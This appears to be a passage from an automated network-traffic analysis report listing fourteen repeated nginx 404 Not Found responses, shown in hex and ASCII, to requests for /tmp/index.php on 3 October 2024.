Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
